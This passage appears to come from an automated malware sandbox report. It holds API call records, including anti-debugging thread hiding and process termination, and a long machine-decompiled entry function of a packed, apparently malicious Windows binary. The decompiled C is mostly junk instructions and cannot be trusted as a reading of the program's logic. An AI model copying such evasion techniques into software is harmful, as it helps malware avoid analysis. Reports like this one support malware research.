                    • Opcode ID: ed3628479d0de84b9dd0271451d3fd2b69bb2c35695d0e1f0b0588ecae73788e
                    • Instruction ID: d3f95e689ba8c496628c307f2edcf8216086fd22df5a58f6ec7b16fb1a0f409c
                    • Opcode Fuzzy Hash: ed3628479d0de84b9dd0271451d3fd2b69bb2c35695d0e1f0b0588ecae73788e
                    • Instruction Fuzzy Hash: 1E517C74744305A9FF2E3E348D61BEB225A9F4D7A0FA04115FD969B1C1D7A5CCC08642
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnumWindows.USER32(003104A1,?,00000000,00000000,00000040,00000000,?), ref: 00310481
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: EnumInformationThreadWindows
                    • String ID: 1.!T
                    • API String ID: 1954852945-3147410236
                    • Opcode ID: 90e507608f2d66145d6797fe60ab3e5fb8efb1446268302234f37188e06cb9a0
                    • Instruction ID: 209d814025adae8da057aa9cf0ba9c22ff31e79f58bd8afc49d361747501d016
                    • Opcode Fuzzy Hash: 90e507608f2d66145d6797fe60ab3e5fb8efb1446268302234f37188e06cb9a0
                    • Instruction Fuzzy Hash: 8B317B34344305AAFB1E7E388DA17EB2695DF4E794F604129FD869B1C1DBA5C8C1C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • CloseServiceHandle.ADVAPI32(?,00000000,00000004), ref: 00310B52
                    • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 003129B5
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: CloseHandleLibraryLoadProcessServiceTerminate
                    • String ID:
                    • API String ID: 3893904122-0
                    • Opcode ID: c672aa40a8413f3ff397fe6fca062ec27c13daa26c55625c4d799e9e08b19e20
                    • Instruction ID: 293c14f89fb717ec4770b07d975955c8e7e41001c9575d719a0ba464a53a1f13
                    • Opcode Fuzzy Hash: c672aa40a8413f3ff397fe6fca062ec27c13daa26c55625c4d799e9e08b19e20
                    • Instruction Fuzzy Hash: 2E027B70740305EEEF3E6E24CC95BEE2266EF9D350FA54129FD859B1C5C7B988C68601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			_entry_(signed int __eax, void* __ebx, intOrPtr* __ecx, signed int __edx, signed int __edi, void* __esi) {
                    				signed char _t253;
                    				signed char _t254;
                    				signed char _t256;
                    				signed int _t257;
                    				void* _t258;
                    				signed int _t261;
                    				signed char _t262;
                    				signed int _t265;
                    				signed int _t266;
                    				signed char _t268;
                    				signed int _t269;
                    				intOrPtr* _t270;
                    				signed char _t271;
                    				signed char _t272;
                    				void* _t274;
                    				signed char _t277;
                    				signed char _t278;
                    				signed char _t279;
                    				signed char _t280;
                    				signed char _t282;
                    				intOrPtr* _t283;
                    				intOrPtr* _t284;
                    				intOrPtr* _t285;
                    				intOrPtr* _t287;
                    				intOrPtr* _t289;
                    				void* _t290;
                    				intOrPtr* _t291;
                    				void* _t292;
                    				intOrPtr* _t293;
                    				void* _t295;
                    				intOrPtr* _t296;
                    				void* _t297;
                    				intOrPtr* _t298;
                    				signed char _t300;
                    				signed int _t301;
                    				signed char _t302;
                    				intOrPtr* _t303;
                    				void* _t304;
                    				signed int _t305;
                    				intOrPtr* _t307;
                    				intOrPtr* _t308;
                    				void* _t309;
                    				intOrPtr* _t310;
                    				intOrPtr* _t311;
                    				intOrPtr* _t312;
                    				intOrPtr* _t313;
                    				signed int _t314;
                    				void* _t315;
                    				intOrPtr* _t316;
                    				signed char _t317;
                    				intOrPtr* _t319;
                    				intOrPtr* _t322;
                    				intOrPtr* _t323;
                    				intOrPtr* _t324;
                    				signed char _t325;
                    				signed int _t329;
                    				void* _t331;
                    				signed int _t334;
                    				void* _t336;
                    				signed char _t339;
                    				void* _t340;
                    				signed int _t341;
                    				signed int _t342;
                    				signed char _t344;
                    				intOrPtr* _t347;
                    				void* _t348;
                    				signed int _t351;
                    				signed int _t352;
                    				signed int _t355;
                    				intOrPtr* _t356;
                    				intOrPtr* _t357;
                    				intOrPtr* _t358;
                    				void* _t359;
                    				void* _t360;
                    				void* _t361;
                    				signed char _t362;
                    				signed int _t367;
                    				intOrPtr* _t369;
                    				signed int _t370;
                    				signed int _t372;
                    				signed int _t373;
                    				void* _t379;
                    				signed int _t380;
                    				signed char _t383;
                    				void* _t384;
                    				intOrPtr* _t385;
                    				signed int _t387;
                    				signed int _t390;
                    				signed int _t394;
                    				intOrPtr* _t395;
                    				void* _t396;
                    				void* _t401;
                    				signed int _t402;
                    				signed int _t406;
                    				void* _t407;
                    				void* _t408;
                    				signed int _t409;
                    				signed int _t411;
                    				signed int _t414;
                    				signed int _t415;
                    				signed int _t417;
                    				void* _t419;
                    				void* _t420;
                    				void* _t422;
                    				signed int _t423;
                    				intOrPtr _t438;
                    				signed int _t440;
                    				intOrPtr _t448;
                    				intOrPtr _t449;
                    				intOrPtr _t450;
                    				intOrPtr _t451;
                    				signed int _t454;
                    				intOrPtr _t462;
                    				intOrPtr _t464;
                    				intOrPtr _t467;
                    				intOrPtr _t470;
                    				signed int _t476;
                    				intOrPtr* _t479;
                    				signed char _t483;
                    				intOrPtr _t484;
                    				signed char _t489;
                    				intOrPtr _t490;
                    				signed char _t493;
                    				intOrPtr _t498;
                    
                    				_t380 = __edx;
                    				_t369 = __ecx;
                    				_push("VB5!6&*"); // executed
                    				L00401210(); // executed
                    				 *__eax =  *__eax + __eax;
                    				 *__eax =  *__eax + __eax;
                    				 *__eax =  *__eax + __eax;
                    				 *__eax =  *__eax ^ __eax;
                    				 *__eax =  *__eax + __eax;
                    				_t253 = __eax + 1;
                    				 *_t253 =  *_t253 + _t253;
                    				 *_t253 =  *_t253 + _t253;
                    				 *_t253 =  *_t253 + _t253;
                    				 *__edi =  *__edi + _t253;
                    				_t254 = _t253 | 0x000000c7;
                    				asm("stosd");
                    				asm("pushfd");
                    				_t354 = __ebx + _t254;
                    				_t394 = __esi + 1;
                    				_t255 = __edi;
                    				_t383 = _t254;
                    				asm("sbb eax, 0xa17d13c7");
                    				asm("popad");
                    				asm("in eax, 0x0");
                    				 *__edi =  *__edi + __edi;
                    				 *__edi =  *__edi + __edi;
                    				 *__ecx =  *__ecx + __edi;
                    				 *__edi =  *__edi + __edi;
                    				 *__edi =  *__edi + __edi;
                    				 *((intOrPtr*)(__edi + __edi)) =  *((intOrPtr*)(__edi + __edi)) + __edi;
                    				 *__edi =  *__edi + __edi;
                    				asm("popad");
                    				asm("o16 jz 0x75");
                    				if( *__edi >= 0) {
                    					L4:
                    					_t383 = _t383 - 1;
                    					 *_t255 =  *_t255 + _t255;
                    				} else {
                    					 *__edi =  *__edi + __edi;
                    					 *__edi =  *__edi + __edi;
                    					 *__edi =  *__edi + __edi;
                    					 *__edi =  *__edi + __edi;
                    					 *__edi =  *__edi + __edi;
                    					_t414 =  *(_t401 + 0x74) * 0x73 - 1;
                    					 *__edi =  *__edi ^ __edi;
                    					_pop(ds);
                    					_t401 = 0xafadf0f4;
                    					_t352 = _t354;
                    					_t354 = __edi;
                    					 *0xFFFFFFFFAFADF0A0 =  *0xFFFFFFFFAFADF0A0 | 0x000000ed;
                    					_t255 = _t352 - 0xb9;
                    					 *((intOrPtr*)(__edx + 0x3ba912d4)) = cs;
                    					asm("cmc");
                    					asm("invalid");
                    					if(_t255 >= 0) {
                    						 *0xaa7e7c1b = _t255;
                    						_t255 = _t255 + 0xf0;
                    						_push(0xafadf0f4);
                    						_t354 = __edi ^  *(__ecx - 0x48ee309a);
                    						asm("cdq");
                    						asm("iretw");
                    						asm("adc [edi+0xaa000c], esi");
                    						asm("pushad");
                    						asm("rcl dword [ebx], cl");
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						 *_t255 =  *_t255 + _t255;
                    						asm("rol dword [0x4f0000], 0x0");
                    						goto L4;
                    					}
                    				}
                    				 *_t255 =  *_t255 + _t255;
                    				_t256 = _t255 |  *_t255;
                    				_push(_t394);
                    				asm("gs outsb");
                    				if(_t256 != 0) {
                    					L10:
                    					_t257 = _t256 |  *_t256;
                    					_t440 = _t257;
                    					_push(_t414);
                    					if(_t440 < 0) {
                    						goto L18;
                    					} else {
                    						asm("a16 jz 0x77");
                    						asm("popad");
                    						if(_t440 != 0) {
                    							 *_t394 =  *_t394 + _t257;
                    							 *((intOrPtr*)(_t257 + _t257)) =  *((intOrPtr*)(_t257 + _t257)) + _t257;
                    							asm("bound ebp, [ecx+0x6c]");
                    							asm("bound eax, [eax]");
                    							_t347 = _t257 + 0x5e50748;
                    							asm("sti");
                    							_pop(es);
                    							asm("adc al, [ecx]");
                    							_t354 = _t354 + _t354;
                    							_t401 = _t401 +  *_t394;
                    							 *_t347 =  *_t347 + _t347;
                    							 *_t354 =  *_t354 + _t347;
                    							_t348 = _t347 + 0x706e5500;
                    							asm("insb");
                    							 *[gs:esi] =  *[gs:esi] + _t348;
                    							 *_t383 =  *_t383 + _t369;
                    							 *((intOrPtr*)(_t369 + 0x6e)) =  *((intOrPtr*)(_t369 + 0x6e)) + _t369;
                    							_t394 =  *(_t354 + 0x64) * 0x5003165;
                    							asm("repne push es");
                    							asm("in eax, 0x6");
                    							asm("cli");
                    							 *_t380 =  *_t380 + _t380;
                    							_t257 = _t348 + 0xb9 +  *((intOrPtr*)(_t348 + 0xb9));
                    							goto L14;
                    						}
                    					}
                    				} else {
                    					asm("gs insb");
                    					asm("popad");
                    					asm("outsb");
                    					_t351 = _t256 ^ 0x00000000 | 0x76000c01;
                    					asm("popad");
                    					asm("insb");
                    					asm("a16 insd");
                    					asm("gs outsb");
                    					 *_t351 =  *_t351 + _t351;
                    					_t380 = _t380 + 1;
                    					 *((intOrPtr*)( *(_t383 + 0x68) * 0x19006465 + _t369)) =  *((intOrPtr*)( *(_t383 + 0x68) * 0x19006465 + _t369)) + _t351;
                    					 *(_t394 + 0x61) =  *(_t394 + 0x61) + _t380;
                    					asm("insb");
                    					asm("a16 insd");
                    					asm("gs outsb");
                    					 *_t351 =  *_t351 + _t351;
                    					asm("sbb eax, [es:eax]");
                    					 *((intOrPtr*)(_t401 + 0x18)) =  *((intOrPtr*)(_t401 + 0x18)) + _t351;
                    					 *_t351 =  *_t351 + _t351;
                    					_t257 =  *(_t383 + 0x68) * 0x35006465;
                    					_t414 = _t351;
                    					asm("sbb eax, 0x440000");
                    					_t394 = _t394 + 1;
                    					_t383 = _t383 + _t383;
                    					 *((intOrPtr*)(_t257 + _t257)) =  *((intOrPtr*)(_t257 + _t257)) + _t401;
                    					 *_t257 =  *_t257 + _t257;
                    					 *0x6d615300 =  *0x6d615300 + _t257;
                    					asm("insd");
                    					 *[gs:esi] =  *[gs:esi] + _t257;
                    					 *0x72655400 =  *0x72655400 + _t369;
                    					_t438 =  *0x72655400;
                    					if(_t438 != 0) {
                    						L15:
                    						_pop(es);
                    						 *((intOrPtr*)(_t380 + 0x75)) =  *((intOrPtr*)(_t380 + 0x75)) + _t380;
                    						asm("outsb");
                    						goto L16;
                    					} else {
                    						if(_t438 == 0) {
                    							L14:
                    							_t354 = _t354 + _t354;
                    							_t401 = _t401 +  *_t380;
                    							 *_t257 =  *_t257 + _t257;
                    							 *((intOrPtr*)(_t383 + _t257)) =  *((intOrPtr*)(_t383 + _t257)) + _t257;
                    							goto L15;
                    						} else {
                    							if(_t438 >= 0) {
                    								L16:
                    								asm("a16 jae 0x77");
                    								 *[gs:esi] =  *[gs:esi] + _t257;
                    								 *_t369 =  *_t369 + _t369;
                    								 *((intOrPtr*)(_t394 + 0x6f)) =  *((intOrPtr*)(_t394 + 0x6f)) + _t257;
                    								asm("insb");
                    								asm("a16 aaa");
                    								 *0x28e0146 =  *0x28e0146 + _t257;
                    								if( *0x28e0146 >= 0) {
                    									 *(_t380 + _t380) =  *(_t380 + _t380) + 1;
                    									L18:
                    									_t257 = _t257 +  *_t257;
                    								}
                    								_t354 = _t354 + _t354;
                    								_t401 = _t401 +  *((intOrPtr*)(_t257 + _t257));
                    							} else {
                    								_t394 = 1 +  *_t380 * 5;
                    								asm("movsd");
                    								_t256 = _t257 + 0x120296;
                    								_t354 = _t354 +  *((intOrPtr*)(_t401 + 7)) + _t354 +  *((intOrPtr*)(_t401 + 7));
                    								_t401 = _t401 +  *_t256;
                    								 *_t256 =  *_t256 + _t256;
                    								 *_t380 =  *_t380 + _t256;
                    								goto L10;
                    							}
                    						}
                    					}
                    				}
                    				 *_t257 =  *_t257 + _t257;
                    				_t258 = _t257 + 0x54530008;
                    				_t384 = _t383 - 1;
                    				_push(_t380);
                    				_t370 = _t369 + 1;
                    				_t355 = _t354 - 1;
                    				_push(_t355);
                    				_t402 = _t401 + 1;
                    				 *_t394 =  *_t394 + _t258;
                    				 *_t380 =  *_t380 + _t370;
                    				 *((intOrPtr*)(_t380 + 0x6f)) =  *((intOrPtr*)(_t380 + 0x6f)) + _t258;
                    				asm("insb");
                    				_t415 =  *(_t384 + 0x73) * 0x7474616d;
                    				 *0x88003cf =  *0x88003cf + _t258;
                    				_t385 = _t384 - 1;
                    				 *_t380 =  *_t380 + _t380;
                    				 *_t355 =  *_t355 + 1;
                    				_t261 = _t258 + 0xdb ^  *(_t258 + 0xdb);
                    				 *_t261 =  *_t261 + _t261;
                    				_push(es);
                    				_t262 = _t261 |  *_t261;
                    				_push(_t262);
                    				if(_t262 >= 0) {
                    					L30:
                    					_t380 = _t380 +  *((intOrPtr*)(_t370 + 0x30031c03));
                    					 *_t380 =  *_t380 + _t380;
                    					_pop(es);
                    					_t355 = _t355 + _t355;
                    					goto L31;
                    				} else {
                    					asm("arpl [eax+0x6f], bp");
                    					_t415 =  *[fs:ecx+0x38] * 0xe010600;
                    					_t41 = _t394 + 0x67;
                    					 *_t41 =  *((intOrPtr*)(_t394 + 0x67)) + _t370;
                    					_t448 =  *_t41;
                    					asm("insb");
                    					asm("gs outsb");
                    					asm("popad");
                    					if(_t448 <= 0) {
                    						L31:
                    						 *_t355 =  *_t355 + 1;
                    						asm("das");
                    						 *_t262 =  *_t262 + _t262;
                    						 *_t370 =  *_t370 + _t370;
                    						asm("str word [ebx+0x75]");
                    						goto L32;
                    					} else {
                    						if(_t448 >= 0) {
                    							L32:
                    							_t355 = _t355 - 1;
                    							_t454 = _t355;
                    							if(_t454 != 0) {
                    								asm("bound esp, [ebp+0x6c]");
                    								goto L48;
                    							} else {
                    								if(_t454 >= 0) {
                    									L51:
                    									 *_t355 =  *_t355 + 1;
                    									_t265 = (_t262 |  *_t262) - 0xc000000 + 0x52594400;
                    									_t402 = _t402 + 1;
                    									_push(_t265);
                    									 *_t394 =  *_t394 + _t265;
                    									 *_t394 =  *_t394 + _t370;
                    									_t59 = _t355 + 0x65;
                    									 *_t59 =  *((intOrPtr*)(_t355 + 0x65)) + _t265;
                    									_t464 =  *_t59;
                    									if(_t464 < 0) {
                    										goto L63;
                    									} else {
                    										asm("bound esi, [edx+0x6f]");
                    										if(_t464 >= 0) {
                    											goto L64;
                    										} else {
                    											_t402 =  *(_t394 + 0x61) * 0x500746e;
                    											_push(6);
                    											asm("aam 0x4");
                    											_push(_t394);
                    											_t265 = _t265 + 0xffffffffff000b44;
                    											 *_t265 =  *_t265 + _t265;
                    											 *0x68610005 =  *0x68610005 + _t370;
                    											asm("arpl [edi+0x70], bp");
                    											 *_t394 =  *_t394 + _t265;
                    											 *((intOrPtr*)(_t265 + _t265)) =  *((intOrPtr*)(_t265 + _t265)) + _t370;
                    											_t402 = _t402 +  *_t355 + 1;
                    											asm("outsb");
                    											_t417 =  *(_t402 + 0x6c) * 0x74;
                    											asm("insd");
                    											asm("popad");
                    											asm("outsb");
                    											if(_t417 >= 0) {
                    												goto L65;
                    											} else {
                    												 *0x37303b3 =  *0x37303b3 + _t265;
                    												_t467 =  *0x37303b3;
                    												if(_t467 < 0) {
                    													_t339 = _t265 ^  *(_t394 + _t355 * 4);
                    													goto L58;
                    												}
                    												goto L59;
                    											}
                    										}
                    									}
                    								} else {
                    									if(_t454 < 0) {
                    										goto L45;
                    									} else {
                    										if(_t454 >= 0) {
                    											L50:
                    											_pop(_t355);
                    											 *((intOrPtr*)(_t394 + 2)) =  *((intOrPtr*)(_t394 + 2)) + _t370;
                    											goto L51;
                    										} else {
                    											if(_t454 < 0) {
                    												L48:
                    												asm("insb");
                    												if (_t462 == 0) goto L49;
                    												_t262 = _t262 + 0x15b0447;
                    												goto L50;
                    											} else {
                    												asm("a16 outsb");
                    												 *_t262 =  *_t262 ^ _t262;
                    												_push(es);
                    												 *_t394 =  *_t394 + _t262;
                    												 *((intOrPtr*)(_t394 + 0x72)) =  *((intOrPtr*)(_t394 + 0x72)) + _t262;
                    												asm("fs outsb");
                    												goto L38;
                    											}
                    										}
                    									}
                    								}
                    							}
                    						} else {
                    							asm("o16 insb");
                    							 *_t262 =  *_t262 ^ _t262;
                    							_t262 = _t262 + 0x7080100;
                    							asm("movsd");
                    							_push(es);
                    							 *_t385 =  *_t385 + _t262;
                    							asm("adc al, [0x2d03ff00]");
                    							 *_t262 =  *_t262 + _t262;
                    							 *_t385 =  *_t385 + _t262;
                    							 *_t262 =  *_t262 | _t262;
                    							_t370 = _t355;
                    							_t394 = _t394 - 0xffffffffffffffff;
                    							_t385 = _t385;
                    							_push(_t262);
                    							_push(_t415);
                    							 *_t394 =  *_t394 + _t262;
                    							 *_t380 =  *_t380 + _t370;
                    							_t43 = _t355 + 0x61;
                    							 *_t43 =  *((intOrPtr*)(_t355 + 0x61)) + _t262;
                    							_t449 =  *_t43;
                    							if(_t449 < 0) {
                    								L38:
                    								asm("outsb");
                    								_t340 = _t262 + 0x790076b;
                    								asm("stc");
                    								_t355 = _t355 + _t340;
                    								_t341 = _t340 + 0x12;
                    								 *_t341 =  *_t341 | _t341;
                    								 *_t355 =  *_t355 + 1;
                    								_t342 = _t341 & 0x0a000000;
                    								goto L39;
                    							} else {
                    								asm("outsb");
                    								asm("popad");
                    								if(_t449 < 0) {
                    									L39:
                    									_t265 = _t342;
                    									asm("o16 jb 0x72");
                    									if (_t265 >= 0) goto L40;
                    									_push(es);
                    									 *_t385 =  *_t385 + _t265;
                    									_t53 = _t385 + 0x65;
                    									 *_t53 =  *((intOrPtr*)(_t385 + 0x65)) + _t265;
                    									asm("outsb");
                    									if ( *_t53 < 0) goto L54;
                    									goto L41;
                    								} else {
                    									asm("movsb");
                    									_t385 = _t385 +  *((intOrPtr*)(_t380 + 0x61205));
                    									 *_t355 =  *_t355 + 1;
                    									_t344 = (_t262 ^ 0x00000000) + 0x808087b;
                    									 *_t344 =  *_t344 + _t344;
                    									 *_t355 =  *_t355 | _t370;
                    									_t46 = _t380 + 0x69;
                    									 *_t46 =  *((intOrPtr*)(_t380 + 0x69)) + _t344;
                    									_t450 =  *_t46;
                    									if(_t450 >= 0) {
                    										 *_t344 =  *_t344 | _t344;
                    										 *_t355 =  *_t355 + 1;
                    										_t339 = _t344 ^  *_t344;
                    										 *_t339 =  *_t339 + _t339;
                    										_t370 = _t370 |  *0x62757300;
                    										asm("bound esp, [ecx+0x6c]");
                    										asm("insb");
                    										asm("popad");
                    										if(_t370 >= 0) {
                    											L58:
                    											_t265 = _t339 + 0x9e;
                    											L59:
                    											_t380 = _t380 +  *_t380;
                    											 *_t355 =  *_t355 + 1;
                    											_t265 = _t265 - 0xe000000;
                    											_push(cs);
                    											_t67 = _t355 + 0x6d;
                    											 *_t67 =  *((intOrPtr*)(_t355 + 0x6d)) + _t380;
                    											_t470 =  *_t67;
                    											asm("outsd");
                    											if(_t470 != 0) {
                    												asm("adc [edx], ecx");
                    												goto L69;
                    											} else {
                    												if(_t470 < 0) {
                    													L69:
                    													_t265 = _t265 |  *_t265;
                    													_t476 = _t265;
                    													asm("popad");
                    													asm("outsb");
                    													if(_t476 == 0) {
                    														goto L77;
                    													} else {
                    														goto L70;
                    													}
                    												} else {
                    													if(_t470 >= 0) {
                    														L70:
                    														if(_t476 < 0) {
                    															L79:
                    															_push(es);
                    															asm("adc dl, [edx]");
                    															_t356 = _t355 + _t355;
                    															 *_t268 =  *_t268 + _t268;
                    															 *((intOrPtr*)(_t356 + _t370)) =  *((intOrPtr*)(_t356 + _t370)) + _t380;
                    															 *((intOrPtr*)(_t385 + 0x43)) =  *((intOrPtr*)(_t385 + 0x43)) + _t370;
                    															_push(_t417);
                    															_t269 = _t268 - 1;
                    															_t406 = _t402 +  *_t370 + 1;
                    															_push(_t380);
                    															_t372 = _t370 + 2;
                    															_t419 = _t417 + 1 - 1;
                    															_t380 = _t380 + 1;
                    															 *_t394 =  *_t394 + _t269;
                    															 *((intOrPtr*)(_t269 + _t269)) =  *((intOrPtr*)(_t269 + _t269)) + _t269;
                    															asm("outsb");
                    															asm("outsd");
                    															asm("outsb");
                    															 *[gs:0x797043b] =  *[gs:0x797043b] + _t269;
                    														} else {
                    															if(_t476 != 0) {
                    																L76:
                    																asm("gs outsb");
                    																L77:
                    																asm("outsb");
                    																if (_t479 >= 0) goto L78;
                    																_t268 = _t265 + 0x041e042b ^  *_t380;
                    																asm("rol dword [esi], 0x12");
                    																goto L79;
                    															} else {
                    																asm("gs outsb");
                    																 *_t394 =  *_t394 + _t265;
                    																 *_t385 =  *_t385 + _t265;
                    																 *((intOrPtr*)(_t355 + 0x50)) =  *((intOrPtr*)(_t355 + 0x50)) + _t380;
                    																_pop(_t379);
                    																_t372 = _t379 - 1;
                    																_t394 = _t394;
                    																 *0x496053c =  *0x496053c + _t265;
                    																asm("lahf");
                    																es = _t417;
                    																asm("adc dl, [eax]");
                    																_t356 = _t355 + _t355;
                    																_t406 = _t402 +  *_t372;
                    																 *_t265 =  *_t265 + _t265;
                    																 *_t380 =  *_t380 + _t380;
                    																_t269 = _t265;
                    																_t419 = _t417 + 1;
                    																asm("gs insd");
                    																asm("outsd");
                    																 *_t394 =  *_t394 + _t269;
                    																 *_t356 =  *_t356 + _t372;
                    																_t78 = _t372 + 0x62 + _t406 * 2;
                    																 *_t78 =  *((intOrPtr*)(_t372 + 0x62 + _t406 * 2)) + _t372;
                    																if( *_t78 >= 0) {
                    																	asm("insb");
                    																	_t390 =  *(_t380 + 0x61) * 0x80050074;
                    																	 *0x31d0480 =  *0x31d0480 + _t269;
                    																	_t265 = _t269 ^  *0x111205f4;
                    																	_t355 = _t356 + _t356;
                    																	_t402 = _t406 +  *_t394;
                    																	 *_t265 =  *_t265 + _t265;
                    																	 *_t355 =  *_t355 + _t380;
                    																	_pop(es);
                    																	 *((intOrPtr*)(_t372 + 0x41 + _t372 * 2)) =  *((intOrPtr*)(_t372 + 0x41 + _t372 * 2)) + _t265;
                    																	_t394 = _t394 - 1;
                    																	_t385 = _t390 + 1 - 1;
                    																	_t479 = _t385;
                    																	_push(_t355);
                    																	 *_t394 =  *_t394 + _t265;
                    																	 *0x6c6f4300 =  *0x6c6f4300 + _t370;
                    																	asm("insb");
                    																	asm("popad");
                    																	asm("bound esi, [ebx+0x61]");
                    																	asm("insd");
                    																	asm("insd");
                    																	goto L76;
                    																}
                    															}
                    														}
                    													} else {
                    														asm("bound ebp, [edi+0x72]");
                    														 *[fs:esi] =  *[fs:esi] + _t265;
                    														 *0x726b7300 =  *0x726b7300 + _t265;
                    														_t415 =  *_t394 * 5;
                    														L63:
                    														_t266 = _t265 + 0x1fa00e5;
                    														 *_t394 = _t266;
                    														asm("repne add [edx], edx");
                    														_t265 = _t266 | 0x2703ff00;
                    														 *_t265 =  *_t265 + _t265;
                    														L64:
                    														 *_t265 =  *_t265 + _t265;
                    														asm("invd");
                    														 *((intOrPtr*)(_t385 + 0x4f)) =  *((intOrPtr*)(_t385 + 0x4f)) + _t380;
                    														_push(_t394);
                    														_push(_t380);
                    														_t370 = _t370 + 1;
                    														 *_t394 =  *_t394 + _t265;
                    														 *0x4b454200 =  *0x4b454200 + _t265;
                    														_t402 = _t402 + 1;
                    														_push(_t265);
                    														 *0x2fb085f =  *0x2fb085f + _t265;
                    														 *_t355 = _t265;
                    														asm("rol byte [edx], 0x12");
                    														_push(cs);
                    														_t355 = _t355 + _t355;
                    														_t417 = _t415 - 1 +  *((intOrPtr*)(_t265 + _t265));
                    														 *_t265 =  *_t265 + _t265;
                    														asm("adc [eax+eax], al");
                    														L65:
                    														 *((intOrPtr*)(_t355 + 0x63)) =  *((intOrPtr*)(_t355 + 0x63)) + _t380;
                    													}
                    												}
                    											}
                    										} else {
                    											goto L44;
                    										}
                    									} else {
                    										if(_t450 == 0) {
                    											L41:
                    											_t417 =  *_t355 * 0x2b049c05;
                    										} else {
                    											asm("outsb");
                    											 *[gs:0x701] =  *[gs:0x701] + _t344;
                    											_t48 = _t355 + 0x72;
                    											 *_t48 =  *((intOrPtr*)(_t355 + 0x72)) + _t380;
                    											_t451 =  *_t48;
                    											if(_t451 >= 0) {
                    												L44:
                    												_push(0x6006c61);
                    												 *_t355 =  *_t355 + _t370;
                    												_t55 = _t394 + 0x6c;
                    												 *_t55 =  *((intOrPtr*)(_t394 + 0x6c)) + _t339;
                    												_t462 =  *_t55;
                    												if (_t462 < 0) goto L56;
                    												L45:
                    												asm("fs outsd");
                    											} else {
                    												asm("outsb");
                    												if (_t451 == 0) goto L29;
                    												_t262 = _t344 + 0x3b102ce;
                    												goto L30;
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				_t270 = _t269 + 0x97;
                    				_pop(es);
                    				asm("stosb");
                    				_t420 = _t419 + _t394;
                    				_pop(es);
                    				asm("adc dl, [ebx]");
                    				_t357 = _t356 + _t356;
                    				_t407 = _t406 +  *_t394;
                    				 *_t270 =  *_t270 + _t270;
                    				 *0x6e550005 =  *0x6e550005 + _t380;
                    				_push(0x6006961);
                    				 *_t385 =  *_t385 + _t372;
                    				_t97 = _t380 + 0x65;
                    				 *_t97 =  *((intOrPtr*)(_t380 + 0x65)) + _t270;
                    				asm("popad");
                    				asm("arpl [edi+0x6e], bp");
                    				if( *_t97 >= 0) {
                    					L87:
                    					_t372 = _t372 + 1;
                    					_t271 = _t270 + 0x2f300dd;
                    					asm("adc dl, [esi]");
                    					_t357 = _t357 + _t357;
                    					_t407 = _t407 +  *((intOrPtr*)(_t271 + _t271));
                    					 *_t271 =  *_t271 + _t271;
                    					asm("sbb [eax], cl");
                    					 *((intOrPtr*)(_t407 + 0x61)) =  *((intOrPtr*)(_t407 + 0x61)) + _t372;
                    					asm("a16 outsb");
                    					_t394 =  *(_t271 + 0x6f) * 0x1060074;
                    					_t272 = _t271 |  *_t271;
                    					goto L88;
                    				} else {
                    					asm("insb");
                    					asm("popad");
                    					asm("popad");
                    					asm("outsb");
                    					 *_t372 = _t270 + 0x3a60107;
                    					asm("rol byte [ebx], 1");
                    					asm("adc dl, [eax+eax]");
                    					 *_t357 =  *_t357 + 1;
                    					_t272 =  *_t372 ^ 0x16000000;
                    					_t483 = _t272;
                    					asm("lldt word [ebx+0x69]");
                    					asm("insb");
                    					if(_t483 == 0) {
                    						L89:
                    						asm("popad");
                    						asm("outsb");
                    						asm("arpl [ebp+0x6c], sp");
                    						goto L90;
                    					} else {
                    						if(_t483 < 0) {
                    							L88:
                    							 *((intOrPtr*)(_t380 + 0x6f)) =  *((intOrPtr*)(_t380 + 0x6f)) + _t380;
                    							asm("insd");
                    							goto L89;
                    						} else {
                    							asm("outsd");
                    							if(_t483 < 0) {
                    								L90:
                    								asm("insb");
                    								_t274 = (_t272 ^  *[gs:eax]) + 0xea07d7;
                    								goto L91;
                    							} else {
                    								_t334 = _t272 ^  *_t272;
                    								_push(es);
                    								 *((intOrPtr*)(_t334 + _t334)) =  *((intOrPtr*)(_t334 + _t334)) + _t372;
                    								asm("popad");
                    								_push(0x5006465);
                    								 *_t394 =  *_t394 | _t334;
                    								_t336 = _t334 + 0xdf;
                    								_t422 = _t420 +  *0x151202;
                    								 *_t357 =  *_t357 + 1;
                    								 *[cs:eax] =  *[cs:eax] + _t336;
                    								 *_t385 =  *_t385 + _t380;
                    								_t278 = _t336 + 0x41524700;
                    								_push(_t394);
                    								_t408 = 1 +  *(_t420 + 0x73) * 0x61726c6a;
                    								 *_t394 =  *_t394 + _t278;
                    								 *_t385 =  *_t385 + _t372;
                    								_t103 = _t278 + 0x69;
                    								 *_t103 =  *((intOrPtr*)(_t278 + 0x69)) + _t380;
                    								_t484 =  *_t103;
                    								asm("insb");
                    								_push(0x6d657261);
                    								if(_t484 < 0) {
                    									if(_t484 > 0) {
                    										 *0x54105b4 =  *0x54105b4 + _t278;
                    										goto L87;
                    									}
                    									L91:
